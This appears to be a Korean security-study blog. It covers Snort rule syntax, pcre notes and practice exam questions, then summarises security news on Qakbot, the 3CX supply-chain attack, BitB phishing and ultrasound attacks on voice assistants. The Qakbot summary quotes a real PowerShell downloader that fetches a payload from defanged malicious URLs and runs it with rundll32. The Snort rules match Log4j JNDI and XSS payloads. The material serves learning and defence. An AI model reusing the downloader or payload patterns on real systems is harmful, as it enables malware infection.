- SYN 플래그는 flags:S, SYN, FIN 모두 탐지 : flags:SF

옵션 사용 예

	사용 예	설명
content	content:!"GET"; content:"/etc/passwd";	GET 문자열 제외하고 /etc/passwd 문자열 검색
nocase	content:"ROOT"; nocase;	ROOT 문자가 대소문자 상관없이 검색 됨
offset	content:"hello"; offset:20;	첫 20바이트 이후부터 문자 hello가 있는지 검색
depth	content:"GET"; depth:4;	처음부터 4바이트까지 GET 문자가 있는지 검색
depth	content:"webshell.jsp"; offest:4; depth:20;	처음 4바이트 이후부터의 20바이트 중에 webshell.jsp 문자열을 포함하는지 검사
distance	content:"abc"; content:"def"; distance:3;	abc문자 찾은 이후에 3바이트만큼 뒤에서 def 문자가 있는지 검사
within	content:"GET"; depth:3; content:"downloads"; distance:10; within:9;	처음 3바이트까지 GET문자가 있는지 확인하고, 그다음 10바이트만큼 떨어진 지점에서 9바이트 이내에 downloads라는 문자가 있는지 검사
pcre	pcre:"/(http\|ftp) Traffic/"	http Traffic 또는 ftp Traffic 문자열 검색

pcre 사용을 위한 정규식 정리

pcre 사용 규칙 : pcre :"/정규식/";

- 참고 : http://www.perl.or.kr/perl_iyagi/regexp

메타문자

문자	내용	예시	설명
^	문자열의 시작	^t.e	the, tie, toe 가능 settle 불가능
$	문자열의 끝	t.e$	toe, necktie 가능
.	개행문자를 제외한 임의의 한 글자	t.e	the, tie,toe, settle 등이 가능
?	0개 또는 1개 이상 반복되는 것과 매칭	s?he	he 또는 she
+	1개이상 반복된 것과 매칭	s+he	she, sshe, ssssshe tshe 가능. he, the 불가능
*	0개 이상 반복되는것과 매칭	s*he	she, he, ssssshe, the tshe 가능
()	서브 패턴(문자열을 하나로 묶음)	(eg\|le)gs	eggs 또는 legs
()	서브 패턴(문자열을 하나로 묶음)	ba(na)+	bana, banana, bananana 등
[]	문자열 셋	[a-z]	소문자
		[0-9a-zA-Z]	모든 문자
		h[aeo]y	hay, hey, hoy
[^]	문자열 셋 안의 ^는 제외한다는 의미	h[^aeo]y	hay, hey, hoy를 제외
{}	a{m} : 정확하게 m번 반복되는 것과 매칭	ba(na){2}	banana
	a{m,} : 최소 m개 반복되는 것과 매칭	ba(na){1, 2}	bana, banana
	a{m,n} : 최소 m개~n개까지 반복되는 것과 매칭	ba(na){2, 5}	banana, bananana, banananana, banananana
	a{m,n} : 최소 m개~n개까지 반복되는 것과 매칭	o{2, 4}p	oop, ooop, oooop
\	특수 문자 앞에 둠

옵션

옵션	내용	예시
i	대소문자 구별하지 않음	pcre:"/where/i"
s	줄이 넘어가도 문자열을 한줄로 인식	pcre:"/where/s"
x	패턴에 존재하는 모든 공백 무시	pcre:"/where/x"
M	HTTP 메소드 패턴 일치	pcre:"/get/Mi"
U	정규화된 URL 디코딩 문자열 패턴 매칭	pcre:"/cisco/Ui"
H	정규화된 HTTP요청 메시지 Header 내용 패턴 매칭	pcre:"/get/Hi"
P	HTTP 요청 메시지 Body 내용 패턴 매칭	pcre:"/select/Pi"
S	HTTP 응답 코드 패턴 매칭	pcre:"/200/S"
Y	HTTP 응답 상태 메시지 패턴 매칭	pcre:"/OK/Y"

이스케이프 문자

기호	설명
\\	\
\d	모든 숫자
\D	숫자가 아닌 문자	[^0-9]
\s	공백	\t, \n, \r, \f, \v
\S	공백이 아닌 문자
\w	_를 포함한 숫자 또는 문자	[A-Za-z0-9_]
\W	숫자 또는 문자가 아닌 것
\b	단어와 공백 사이를 찾음
[\b]	back space. \b와 혼동하면 안됨
\B	단어 경계가 아님

Snort 탐지룰 예시

1) log4j 관련 snort 탐지룰

(출처 : PIOLINK, https://www.piolink.com/kr/service/Security-Analysis.php?bbsCode=security&vType=view&idx=95)

#CVE-2021-44228
alert tcp any any -> any any (msg:"Apache_Log4j_RCE"; pcre:”/\x24(\x7b|%7B)(jndi:|rmi:|ldap:|dns:) /i")
alert tcp any any -> any any (msg:"Apache_Log4j_RCE"; pcre:"/\x24(\x7b|%7B)(lower:|upper:)?[jndilapsrmev]{1,4}/i")
alert tcp any any -> any any (msg:"Apache_Log4j_RCE"; pcre:"/\x24(\x7b|%7B)(\x3a\x3a\x2d(j|n|d|i)\x7d)/i")

#CVE-2021-45046
alert tcp any any -> any any (msg:"Apache_Log4j_DOS"; contents:"|0d 0a|X-Api-Version|3a 20|"; pcre:"/\x24\7bctx\x3a/i")

#CVE-2021-45105
alert tcp any any -> any any (msg:"Apache_Log4j_DOS"; contents:"|0d 0a|X-Api-Version|3a 20|"; pcre:"/(\x24\x7b){1,}[\x3a,\x2d,\x7b\,\x24]+\x7d/i")

x24 : $
x7b : {
x3a : :
x2d : -
x7d : }

SNORT RULE 관련 문제

Q1 : 모든 네트워크 대역에서 Telnet으로 접속하는 패킷 중 14번째 자리까지 'anonymous'가 포함된 트래픽에 대해서 'Dangerous' 메시지로 경고하는 rule을 만드시오.
(단, 기본적으로 TCP 프로토콜 경유를 탐지함.)

[필요한 룰 헤더]
1. action : alert
2. protocol : tcp
3. 출발지 IP : any
4. 출발지 Port : any
5. 방향 : ->
6. 도착지 IP : any
7. 도착지 Port : 23 (telnet 서비스)

[룰 옵션]
1. 경고 메시지 : msg:"Dangerous"
2. 문자열 탐지 : content:"anonymous"
3. 14번째 자리까지 탐지 : depth:14
4. sid:1000001 (사용자가 설정한 경우 100만 이상지정. 문제에 따로 언급이 없어 생략가능)

주의사항 : ';' 마지막까지 넣기

[결과]
alert tcp any any -> any 23 (msg:"Dangerous"; content:"anonymous"; depth:14; sid:1000001;) 또는
alert tcp any any -> any 23 (msg:"Dangerous"; content:"anonymous"; depth:14;)

Q2 : Snort 정책에서 10바이트에서 12바이트 중 00FF 바이트에 해당하는 내용을 찾으려고 한다.
보기의 rule에 빈칸을 채워 rule을 완성하시오.
alert tcp $EXTERNAL_NET any -> $INTERNAL_NET any (msg:"TEST"; ( A ):"|00FF|"; ( B ):9; ( C ):2; sid:10000001;)

(A) : content
(B) : offset
(C) : depth

Q3. Snot Rule을 보고 다음을 답하시오.
alert any any -> any 80 (msg : "XSS"; content : "GET"; offset:1; depth:3; content:"/login.php?p=<script>"; distance:1;)

1) content : "GET"; offset:1; depth:3; 구문의 의미 ?
페이로드에서 1바이트 띄고 3바이트 내에서 "GET" 문자열을 검사

2) content : "./login.php?p=<script>"; distance:1; 구문의 의미
앞의 매칭된 문자열에서 1byte 떨어진 지점에서 "./login.php?p=<script>" 문자열을 검사

3) "/Login.php?p=<script>" 이 탐지되지 않았다. 위의 룰을 어떻게 변경해야 하는 가?
> 대소문자 구별을 하지않도록 설정하는 nocase 구문을 추가해준다.
alert any any - > any 80 ( msg : "XSS"; content :"GET"; offset:1; depth:3; content:"/login.php?p=<script>"; distance:1; nocase;)

Q4. ①~⑤가 뜻하는 것은?
alert tcp any any -> any ① [443,465,523] ( ② content:"|18 03 00|"; depth: 3; ③ content:"|01|"; distance: 2; within: 1; ④ content:!"|00|"; within: 1; ⑤ msg: "SSLv3 Malicious Heartbleed Request V2"; sid: 1; )

① 목적지 포트가 443, 465, 523

② content에서 첫번째 3바이트를 바이너리 값으로 |18 03 00| 검사

③ ②번이 끝난 위치에서 2바이트 띄고 1바이트 값이 바이너리 값으로 |01| 검사

④ ③번이 끝난 위치에서 바로 1바이트 값이 바이너리 값 |00|이 아닌지(!) 검사

⑤ 위의 모든 조건 만족시 msg : "SSLv3 Malicious Heartbleed Request V2" 를 기록하고 해당 룰의 식별자를 1로 지정

[IT/보안뉴스] 금융보안인증 SW 취약점 공격···北 해커그룹 소행이었다

제나나 — Thu, 20 Apr 2023 19:42:25 +0900

기사 요약 :

금융보안인증 소프트웨어 취약점으로 국내 PC를 해킹한 사건의 배후가 북한의 해킹그룹인 라자루스라고 한다. 해당 해킹 방식은 2021년 4월 금융보안인증 업체를 해킹해 취약점을 발견하고 장기간 공격에 이용할 웹 서버, 경유지를 찾은 다음 대다수가 이용하는 언론사 사이트를 악성코드 유포 사이트로 이용이 하였다고 한다. 해킹된 기관은 61개가 된다고 한다.

- 해킹 공격 : 워터링홀 수법
>> 특정 언론사 사이트 접속 시 자동으로 악성코드가 설치

조재학 기자, 금융보안인증 SW 취약점 공격···北 해커그룹 소행이었다, 전자신문, https://m.etnews.com/20230418000138

금융보안인증 SW 취약점 공격···北 해커그룹 소행이었다

금융보안인증 소프트웨어(SW) 취약점을 악용해 국내 주요 기관 개인용 컴퓨터(PC)를 해킹한 사건이 북한 해커조직 라자루스 소행인 것으로 확인됐다. 경찰청 국가수사본부(안보수사국)는 국가정

www.etnews.com

[IT/보안뉴스] 북한 해커조직, 실제 주소와 똑같은 피싱 사이트 사용한다? BitB 기술 악용

제나나 — Wed, 19 Apr 2023 21:35:29 +0900

기사 요약 :

과거의 피싱 공격의 경우 사이트 주소를 유사하게 바꾸는 눈속임 공격이었다면 최신 공격은 BitB(Browser in the Browser) 기술을 이용하여 실제 사이트 주소가 표시되기 때문에 화면만으로 피싱 페이지를 알 수 없도록 고도화되었다고 한다.

- 과거 : (실제) google.com → (피싱) g00gle.com
- 피싱 사이트 :
1) 정교하게 제작된 CSS 코드
2) 요즘 접속할 때 주소를 확인하는 교육
→ 공격자가 주소 표시줄을 조작하는 기법 개발
3) 가짜 팝업창을 만들기 때문에 정상 팝업창과 달리 브라우저 밖으로 이동되지 않음.

김경애 기자, 북한 해커조직, 실제 주소와 똑같은 피싱 사이트 사용한다? BitB 기술 악용, 보안뉴스, https://m.boannews.com/html/detail.html?idx=117162

북한 해커조직, 실제 주소와 똑같은 피싱 사이트 사용한다? BitB 기술 악용

최근 북한 해커조직이 피싱 공격에 BitB(Browser in the Browser) 기술을 사용하는 등 피싱 관련 기술이 고도화되고 있어 주의가 요구된다. 과거의 피싱 공격은 피싱 사이트의 주소가 실제 사이트와 달

m.boannews.com

[IT/보안뉴스] 뱅킹 악성코드 칵봇, 이메일 하이재킹 통해 국내 유포중

제나나 — Mon, 17 Apr 2023 20:57:40 +0900

기사 요약 :

뱅킹형 악성코드인 칵봇(Qakbot)이 정상 메일을 가로챈 후에 기존 이메일을 회신 및 전달하는 방식으로 악성 PDF 파일을 첨부해서 유포가 진행되고 있다.

[ 악성코드 정보 ]
악성코드 정보 : 원문에 대해 점부파일과 함께 전달되어 첨부파일 열람을 유도.
- 원본 이메일 오간 시점 : 2018년~2022년. 최근 시점은 아님.
- 첨부파일 명 : UT.PDF, RA.PDF, NM.PDF 등과 같은 랜덤문자 형태
- 동작 방식 :
1) 해당 PDF 파일을 실행하면 Microsoft Azure 로고와 함께 OPEN 버튼을 클릭 유도
2) Open 버튼 클릭하면 악성 URL 연결, 암호화된 압축 ZIP 파일 다운
3) 파일 비밀번호 : 본문에 기재된 Password : 755
4) 압축을 해제하면 WSF 파일이 있음
해당 파일 확인하면 안티바이러스 제품 우회를 위해 더미 텍스트와 함께 난독화된 스크립트 코드 확인 가능.
5) WSF 파일을 실행함녀 파워쉘 프로세스를 통해 암호화된 데이터 커맨드를 실행.
해당 파일 복호화하면 URL에서 Qakbot 바이너리를 TMP 경로에 undersluice.Calctuffs 파일명으로 다운로드 후 rundll32.exe 프로세스를 통해 실행.
- 파워쉘 코드 :

powershell.exe” -ENC “Start-Sleep -Seconds 2; 
$Girnie = (“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil,hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J,hxxps://t-lows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/55C63K,hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc”).split(“,”); 
foreach ($reflexional in $Girnie) {
  try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\undersluice.Calctuffs;
  if ((Get-Item $env:TEMP\undersluice.Calctuffs).length -ge 100000) {
    start rundll32 $env:TEMP\\undersluice.Calctuffs,X555;break;}
  } catch {Start-Sleep -Seconds 2;}
 }

6) 해당 커맨드가 실행되면 악성 URL에서 Qakbot 바이너리 유포

김영명 기자, 뱅킹 악성코드 칵봇, 이메일 하이재킹 통해 국내 유포중, 보안뉴스, https://www.boannews.com/media/view.asp?idx=116995&page=2&kind=1

뱅킹 악성코드 칵봇, 이메일 하이재킹 통해 국내 유포중

칵봇(Qakbot) 악성코드가 기존의 이메일을 회신 및 전달하는 형태로 악성 PDF 파일을 첨부해 유포되는 정황이 확인됐다. 뱅킹형 악성코드로 알려진 칵봇은 다양한 매개체를 통해 지속해서 유포되

www.boannews.com

안랩 블로그(ASEC), 이메일 하이재킹을 통해 Qakbot 악성코드 국내 유포 중, https://asec.ahnlab.com/ko/51109/

이메일 하이재킹을 통해 Qakbot 악성코드 국내 유포 중 - ASEC BLOG

AhnLab Security Emergency response Center(ASEC)에서는 기존의 이메일을 이용(회신/전달)하는 형태로 악성 PDF파일을 첨부하여 Qakbot 악성코드가 유포되는 정황을 확인하였다.뱅킹형 악성코드로 알려진 Qakbot

asec.ahnlab.com

[네트워크 보안 기술] 침입 방지 시스템 (IPS, Intrusion Prevention System)

제나나 — Sat, 15 Apr 2023 23:19:58 +0900

침입 방지 시스템

(IPS, Intrusion Prevention System)

방화벽과 IDS(침입탐지시스템)과 같은 네트워크 기반의 차단 솔루션을 논리적으로 결합한 시스템
비정상적인 트래픽을 능동적으로 차단하고 격리하는 등 방어 조치를 취하는 보안 솔루션

IDS(Intrusion Detection System) 침입에 대해 탐지
IPS(Intrusion Prevention System) 침입에 대해 탐지 및 차단까지 수행

사진 출처 : https://www.wallarm.com/what/intrusion-prevention-system

방화벽, IDS, IPS 비교

구분	방화벽(Firewall)	침입탐지시스템(IDS)	침입방지시스템(IPS)
목적	탐지 및 차단	침입 여부 탐지	침입 여부 탐지 및 대응
분석방법	수동적 차단 내부망 보호 패킷 헤더만 검사	시그니처 기반 패턴 매칭 알려진 공격패턴 감지 패킷 데이터 전부 검사	Rule 기반 비정상 행위 방지 패킷 데이터 전부 검사
연결방식	In-Line	Mirroring	In-Line
OSI Layer	3~4 (IP/Port 기반)	3~7	3~7
장애 대응	이중화(HA 구성)	서비스 영향 없음	Bypass mode
시스템 부하	트래픽 지연	부하 없음	트래픽 지연

[참조]
양대일, 네트워크 해킹과 보안: 정보 보안 개론과 실습, 한빛아카데미
https://ko.m.wikipedia.org/wiki/침입_차단_시스템

[IT/보안뉴스] '생체인증' 보안 구멍... 아이폰 '안면인식' 해킹 주의보

제나나 — Fri, 14 Apr 2023 14:55:31 +0900

기사 요약 :

국내 이동통신사의 인증 앱인 '패스(PASS)'가 아이폰에서 안면인식(페이스아이디) 기능으로 화면을 들여다보면 자동으로 인증된다는 허점을 이용해서 해커들이 인증요청을 보내 범죄에 악용할 수 있다고 해서 비밀번호와 같은 추가적인 보안 체계가 필요하다고 한다.

편리성을 강조하다가 보안이 위협되고 있다. 빠른 조치가 필요해 보인다.

[악용 사례]
- 갑작스럽게 PASS 앱 알람 팝업이 와서 팝업창을 클릭하는 순간 자동으로 인증이 완료되어 확인 결과 누군가가 특정 사이트 아이디를 확인 사실을 알게 됨.

- PASS : SK텔레콤, KT, LG 유플러스 등 국내 이동통신 3사가 개발한 간편 인증 앱. 11월 기준으로 앱 사용자는 3600만 명, 모바일 운전면허 확인 서비스 이용자는 470만 명. PASS에서 사용 가능한 기능 : 1) 모바일 주민등록증, 운전면허증 2) 온라인 서류발급, 3) 금융거래, 4) 계약서 전자서명 등에 이용.
SK텔레콤은 3월 초 추가 인증 수단인 '패스키' 도입 됨. 반면, KT, LG유플러스는 PASS 추가 인증 안돼서 무방비 상태

신희강, 김병욱 기자, '생체인증' 보안 구멍... 아이폰 '안면인식' 해킹 주의보, 뉴데일리경제, https://biz.newdaily.co.kr/site/data/html/2023/04/10/2023041000237.html

'생체인증' 보안 구멍... 아이폰 '안면인식' 해킹 주의보

#아이폰을 사용하는 A씨는 최근 황당한 일을 겪었다. 갑작스러운 PASS 앱 알림 팝업이 왔기 때문이다. 안면인식 기능을 사용하는 터라 팝업창을 클릭하는 순간 자동으로 인증이 완료됐다는 문구

biz.newdaily.co.kr

[IT/보안뉴스] 워즈니악 “AI개발 6개월 중단을”… 빌 게이츠 “문제 해결책 아냐”

제나나 — Thu, 13 Apr 2023 21:25:44 +0900

* 생성형 AI(Generative AI) :
이용자의 특정 요구에 따라 결과를 생성해 내는 인공지능. 데이터 원본을 통한 학습으로 소설, 시, 이미지, 비디오, 코딩, 미술 등 다양한 콘텐츠 생성에 이용됨.

기사 요약 :

최근 생성형 AI 챗GPT가 폭발적인 인기와 변화를 불러일으키면서 IT업계에서는 AI 개발을 6개월간 중단해야 한다는 의견이 나와서 찬반으로 논란이 팽팽하게 맞서고 있다.

일단 AI 개발을 일시 중단해야 한다고 주장하는 사람들(스티브 워즈니악, 일론 머스크, 유발 하라리)은 AI 기술이 인류를 대체하고 인류 문명에 대한 통제력을 상실시킬 가능성을 우려하고 있다.
반면 개발을 지속해야 한다고 주장을 내놓는 사람들(빌 게이츠. 안 르쿤, 앤드루 응)은 AI기술은 유익한 기술이며, AI 개발을 중단해도 해당 문제가 해결되는 않는다고 주장하고 있다.
또한 일부 사람들은 AI 시장 주도권을 위해 후발주자들이 개발 중단을 요청하는 것이 아닌가 하는 우려도 있다.

이제 AI는 시대적 흐름이 되어버렸고 이 기술로 인해서 앞으로의 사회는 많이 변화할 거 같다. 찬성하는 사람들과 반대하는 사람들 모두가 AI의 파급력을 예상하고 있기 때문에 이러한 다양한 의견이 충돌하는 것 같다. 현재 상황에서 어떤 결론이 도출될지 주목된다.

남해정 기자, 워즈니악 “AI개발 6개월 중단을”… 빌 게이츠 “문제 해결책 아냐”, 동아일보, https://n.news.naver.com/article/020/0003489981?sid=105

워즈니악 “AI개발 6개월 중단을”… 빌 게이츠 “문제 해결책 아냐”

“GPT-4를 능가하는 인공지능(AI) 시스템의 개발을 6개월간 중단해야 한다.”(스티브 워즈니악 애플 공동창업자 등) “AI 개발을 일시 중단한다고 문제가 해결되지 않는다.”(빌 게이츠 마이크로소

n.news.naver.com

[IT/보안뉴스] 미국의 한국 도·감청 의혹 파장! 해킹을 통한 도·감청 위협은 얼마나?

제나나 — Wed, 12 Apr 2023 01:42:17 +0900

기사 요약 :

최근 미국의 우크라이나 전쟁관련해서 기밀 문건이 SNS으로 유출이 되어 이슈가 된 가운데 한국 정부의 대화도 도·감청된 정황이 있어서 논란이 되고 있다. 우리의 일상생활에서도 도청과 녹취의 위협이 가정용 제품 해킹, 동작 센서 이용, 음성 스피커 해킹과 같은 취약점이 주변에 도사리고 있기 때문에 이러한 위협을 예방하기 위해서는 전문가들은 센서와 스피커 사이에 충분한 거리를 유지하고, 스피커 진동이 센서에 감지되지 않도록 만드는 조치를 취해야 한다고 한다.

[ 용어 정리 ]
- 도청 : 의도를 가지고 특정 공간, 특정 사람을 지목해 이야기, 회의 내용, 전화 통화를 몰래 엿듣거나 녹음하는 일
- 감청 : 도청보다 넓은 범위로 기밀을 보호하거나 수사 따위에 필요한 참고 자료를 얻기 위하여 통신 내용 전체를 듣는 일

[일상생활 도청/감청 예시]
1. 구글 홈(Google Home) 스피커
- 지난 1월 도청 가능한 취약점 발견. 스피커 장비를 일종의 도청장치로 변화해 주는 취약점 발견.
- 범죄자가 무선 통신이 가능할 정도로 장비에 접근하면 백도어를 활용해 계정을 만들고, 원격으로 도청과 감청 명령 가능.
예방 : 최신 패치 적용

2. 안드로이드 기반 장비 가속도계 이용 ('스피어폰')
- 가속도계(동작 센서)를 활용해 사용자의 대화 내용을 추론하는 도청 방식.
- 스마트폰 내 가속도계와 스피커가 가까이 붙어 있는 기기에 한해 스마트폰 본체의 진동 원리를 이용. 음파 정보 분석.
- 악성액 설치 또는 악성 웹사이트 방문했을 경우 스마트폰 해킹해 모션센서를 추적해 도청이 이루어짐.
예방 : 센서와 스피커 사이 거리를 충분히 게 벌리면 스피커의 음파 정보가 담기지 않음.

3. 레이저 도청장치 이용
- 공격자가 대화를 도청하려는 건물 창문에 레이저 도청장치를 이용해 레이저를 쏘면 창문 안쪽의 음파를 분석 가능
- 사람이 말하는 음파의 경우 건물의 벽이나 창에 부딪히는데 이 진동을 분석해 '언어'로 해석 가능.
- 최대 10km 안에 있는 대화 해석 가능하고 기기 성능에 따라 수 km밖에서도 도청 가능.
예방 : 진동자와 도청방지 필름 사용. 진동자는 별도의 음파를 생성하는데 민감한 사람은 소음이 들릴 수 있고, 도청방지 필름은 다층구조로 이뤄진 여러 겹의 필름이 음파를 여러 번 반사시키지만 진동자보단 성능이 부족.

박은주 기자, 미국의 한국 도·감청 의혹 파장! 해킹을 통한 도·감청 위협은 얼마나?, 보안뉴스, https://www.boannews.com/media/view.asp?idx=117010&page=1&kind=1

미국의 한국 도·감청 의혹 파장! 해킹을 통한 도·감청 위협은 얼마나?

우리 생활에는 어떤 도·감청 위협이 도사리고 있으며, 이를 예방하기 위해서는 어떤 조치를 취할 수 있는지 알아봤다. 지난해 벌어진 아파트 월패드 해킹 사건으로 집에서조차 사생활이 유출될

www.boannews.com

[IT/보안뉴스] 사이버 범죄자들, 차량 내 CAN 프로토콜 통해 자동차 훔쳐갔다.

제나나 — Mon, 10 Apr 2023 22:19:49 +0900

기사 요약 :

CAN이라는 계측 제어기 통신망(Controller Area Network) 이라는 프로토콜은 사물인터넷 관련된 프로토콜로 장비들과 마이크로컨트로러가 상호 소통할 때 사용되는데 자동차 내부의 부품들을 이어 줄 때도 사용되어 해당 프로토콜을 이용한 자동차 해킹 기법이 새로 등장하였다. 해당 프로토콜을 악용해서 달리는 차량을 정지하거나 문과 차량을 열고 잠그고 라디오를 마음대로 조작할 수 있다.

- CAN 프로트콜 : 사이드 브레이크, 헤드라이트, 스마트 키 등과 관련되어 있는 통신 프로토콜.
- 가장 대표적인 자동차 해킹 기법 : 무선 열쇠 이용
[ 정상적인 연결 ]
1) 무선 열쇠에서 신호를 보냄
2) 엔진이 해당 신호에 대해 다시 인증 요청
3) 무선 열쇠가 응답

[ 비정상적인 연결 ] 릴레이 공격 실시
1) 해커가 휴대용 무선 릴레이 기지국을 이용해서 차량 근처 무선 열쇠에 쏨.
2) 무선 열쇠가 응답을 함
3) 해당 응답을 차량에 전달
4) 해커가 차량을 통제

문정후 기자, 사이버 범죄자들, 차량 내 CAN 프로토콜 통해 자동차 훔쳐갔다, 보안뉴스, https://www.boannews.com/media/view.asp?idx=116938

사이버 범죄자들, 차량 내 CAN 프로토콜 통해 자동차 훔쳐갔다

새로운 자동차 해킹 기법이 등장했다. 여기서 가장 핵심적인 역할을 하는 건 CAN이라고 하는 ‘계측 제어기 통신망(Controller Area Network)’이다. CAN은 일종의 사물인터넷 프로토콜로, 장비들과 마이

www.boannews.com

[IT/보안뉴스] 3CX DesktopApp에서 공급망 공격 발생

제나나 — Fri, 7 Apr 2023 03:03:44 +0900

기사 요약 :

3CX DesktopApp이라는 통화 및 화상회의 소프트웨어가 북한 라자루스로 추정되는 해킹 그룹에게 공급망 공격을 받은 것이 드러났다. 이 공격은 일부 윈도우 및 맥용 버전에서 정상적으로 서명이 된 채 자동 업데이트를 통해서 악성 DLL 파일이 유포되었고 공격자는 이를 통해 정보 탈취 악성코드를 설치하였다고 한다.

- 3CX 벤더社 : 영상회의 솔루션인 PBX와 기업용 통신앱인 3CX DesktopApp을 제공하는 벤더사. 전 세계 60만 개 기업이 고객사. 매일 1200만 명이 이용하고 있음.

- 공격 대상 : 윈도우(Windows) 및 맥(MAC) 사용자.

- 공격 방식 : 3CX DesktopApp 설치 파일에 악성코드 삽입. 해당 설치 파일로 설치할 경우 내부 인코딩되어 저장된 악성코드가 메모리 상에 동작하면서 추가 악성코드를 설치.

출처 : 안랩 블로그

[윈도우(Windows) 공격 방식]

1) MSI 인스톨러 설치 파일. 내부의 "ffmpeg.dll", "d3dcompiler_47.dll"이 실질적인 악성코드.

2) 설치가 끝난 후 실행되는 "3CXDesptopApp.exe"는 동일한 경로에 존재하는 "ffmpeg.dll"파일을 로드.

3) "ffmpeg.dll"은 "d3dcompiler_47.dll" 파일을 읽어와 복호화하여 메모리 상에서 실행하는 기능을 담당.(뒷부분에 인코딩 된 데이터 포함)

4) "ffmpeg.dll"는 "d3dcompiler_47.dll"에서 "FE ED FA CE FE ED FA CE"이라는 시그니처를 찾는데 인코딩 된 데이터가 포함되어 있는데, 복호화하면 쉘코드가 존재하여 메모리상에서 다운로더 기능을 담당하는 악성코드를 실행시킴.

5) 그러면 악성코드가 깃허브 주소에서 ico 파일(아이콘 파일)을 다운하고 해당 파일의 뒷부분에 실제 C&C 서버 주소가 인코딩 되어 있음.

6) 해당 주소는 정보를 탈취하는 인포스틸러의 주소이다.

[맥(MAC) 공격 방식]

1) DMG 설치 파일에 악성코드가 삽입.

2) 설치 파일 내부에 존재하는 공유 라이브러리 파일들 중 libffmpeg.dylib 파일에 C&C 주소가 XOR로 인코딩 되어 있음.

- 대상 제품 :

Electron Windows application shipped in Update 7	Electron macOS application
18.12.407 18.12.416	18.11.1213 18.12.402 18.12.407 18.12.416

- 해결 방법 :

1) 3CX DesktopApp 삭제

2) 3CX 업체에서는 PWA 어플리케이션을 대신 사용할 것을 권장

김영명 기자, 통화·화상회의 등 가능한 3CX DesktopApp에서 공급망 공격 발생, 보안뉴스, https://www.boannews.com/media/view.asp?idx=116779&kind=1&search=title&find=3cx

통화·화상회의 등 가능한 3CX DesktopApp에서 공급망 공격 발생

3CX DesktopApp을 통해 공급망 공격이 이루어졌다는 내용이 공개됐다. 해당 소프트웨어는 통화, 화상 회의 등 사용자에게 여러 통신 기능을 제공하며 마이크로소프트 윈도(Windows), 애플 맥(MAC) 운영

www.boannews.com

문정후 기자, 3CX 침해 사건, 북한의 라자루스 개입된 거대 공급망 공격 사건?, 보안뉴스, https://www.boannews.com/media/view.asp?idx=116815

3CX 침해 사건, 북한의 라자루스 개입된 거대 공급망 공격 사건?

북한의 라자루스(Lazarus)로 추정되는 해킹 그룹이 최근 3CX의 VoIP 데스크톱 애플리케이션을 침해함으로써 정보 탈취용 멀웨어를 3CX의 고객사에 퍼트리고 있다는 사실이 드러났다. 일부 3CX 고객사

www.boannews.com

안랩 블로그, 3CX DesktopApp 사용 주의 (CVE-2023-29059), https://asec.ahnlab.com/ko/50797/

3CX DesktopApp 사용 주의 (CVE-2023-29059) - ASEC BLOG

개요 3CX DesktopApp을 통해 공급망 공격이 이루어졌다는 내용이 공개되었다.[1] 해당 소프트웨어는 통화, 화상 회의 등 사용자에게 여러 통신 기능을 제공하며 Windows, MAC 운영체제 환경에서 구동이

asec.ahnlab.com

안랩 블로그, 3CX DesktopApp 공급망 공격, 국내에서도 확인, https://asec.ahnlab.com/ko/50965/

3CX DesktopApp 공급망 공격, 국내에서도 확인 - ASEC BLOG

2023년 3월 29일 CrowdStrike는 북한 기반의 공격 그룹이 3CX DesktopApp을 통해 공급망 공격을 수행한 사실을 소개하였다. [1] 공격자는 이를 이용해 정보 탈취 악성코드를 설치하였다. AhnLab Security Emergency

asec.ahnlab.com

[IT/보안뉴스] 들리지 않는 초음파 공격으로 은밀하게 악성 명령을 실행하는 AI 스피커

제나나 — Thu, 6 Apr 2023 08:02:46 +0900

기사요약 :

미국 연구진은 스마트폰, 스마트 스피커, IoT 같은 음성 비서로 구동되는 장치에 대해서 기계는 들을 수 있지만 사람은 들을 수 없는 초음파를 이용하여 조용하게 공격을 할 수 있는 "Near-Ultrasound Inaudible Tojan(NUIT)"이라는 새로운 공격을 개발했다고 한다. 해당 공격에 영향을 받는 장비로 애플의 Siri, 구글의 어시스턴트, 마이크로소프트의 Cortana, 아마존의 Alexa가 있으며, 해당 공격을 이용해서 악성 명령을 실행할 수 있다고 한다.

- NUIT 공격의 주요 원리

인간의 귀로는 들을수 없는 근초음파(Near-Ultrasound)를 이용하여 응답이 가능하기 때문에 기존 스피커를 계속 사용하면서 노출의 위험이 최소화될 수 있다.

- NUIT 공격 예시

1) 미디어, YouTube 비디오를 재생하는 웹 사이트에서 악성 미디어를 재생하도록 하는 사회공학적 공격

2) Zoom 미팅 중에 공격 신호를 삽입하면 컴퓨터 옆에 있는 전화기 해킹 가능

3) IoT가 연결된 스마트폰에 해당 공격을 보내면 문을 열고, 집 경보기 비활성화와 같은 공격이 가능

4) 브라우저 취약성을 악용하여 '워터링 홀' 웹 사이트로 스마트폰 유도 가능

- NUIT 공격이 성공하기 위한 조건

1) 일정 볼륨 이상으로 설정

2) 명령은 0.77초 동안만 지속됨

- NUIT 공격에 대응하는 방법

1) 음성지문으로 스마트기기 인증이 가능하면 해당 방식 활성화

2) 스피커 대신 이어폰을 사용하여 소리를 듣거나 소리를 방송

권준 기자, 초음파 공격으로 AI 스피커 등 스마트홈 시스템 해제 가능, 보안뉴스, https://www.boannews.com/media/view.asp?idx=116844&page=1&kind=1

초음파 공격으로 AI 스피커 등 스마트홈 시스템 해제 가능

IT 외신 레지스터에 의하면 미국 연구진이 스마트 장치 마이크와 음성 비서의 취약점을 악용하여 스마트폰과 홈 장치에 자동으로 원격에서 액세스할 수 있는 Near-Ultrasound Inaudible Trojan용 NUIT라는

www.boannews.com

Bill Toulas, Inaudible ultrasound attack can stealthily control your phone, smart speaker, BLEEPING COMPUTER, https://www.bleepingcomputer.com/news/security/inaudible-ultrasound-attack-can-stealthily-control-your-phone-smart-speaker/

Inaudible ultrasound attack can stealthily control your phone, smart speaker

American university researchers have developed a novel attack which they named "Near-Ultrasound Inaudible Trojan" (NUIT) that can launch silent attacks against devices powered by voice assistants, like smartphones, smart speakers, and other IoTs.

